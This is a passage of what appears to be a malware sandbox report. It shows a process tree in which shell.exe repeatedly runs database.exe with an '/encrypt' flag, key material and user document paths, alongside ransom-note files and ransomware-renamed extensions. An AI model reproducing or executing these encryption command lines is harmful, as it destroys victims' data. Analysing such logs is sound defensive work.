                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\[email protected] 1.2.0.0.id-PWMKXUEAKWFERZZJIPDAFYRRCQTEJNYWNZUY-11@7@2024 4@47@48 PM5858394.randomname-LCAMHADDGXYNDDTSOPLRHLKFDCRQGH.HCB.cbf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\[email protected] 1.2.0.0.id-PWMKXUEAKWFERZZJIPDAFYRRCQTEJNYWNZUY-11@7@2024 4@47@48 PM5858394.randomname-MUUTVZCYKMNMQRZFJHNVGFKPTETMQL.SCV.cbf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\InvokeReset.mpp.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\KlOuknCx-RtShbgxB.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\PopRemove.dotx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\README_sTlLoTpq.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\RestartResume.potm.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\RGptjhh0-8d7JZWY0.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\ShowUpdate.docm.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5424
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\StepConvertTo.pot.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\StopSuspend.vsd.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\TraceWatch.potx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\UlIOoJla-v5ZPQHqO.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\UnblockCopy.pps.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\UnregisterUpdate.xla.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\WriteResume.vsw.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\#Decrypt_Files_ReadMe#.rtf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4688
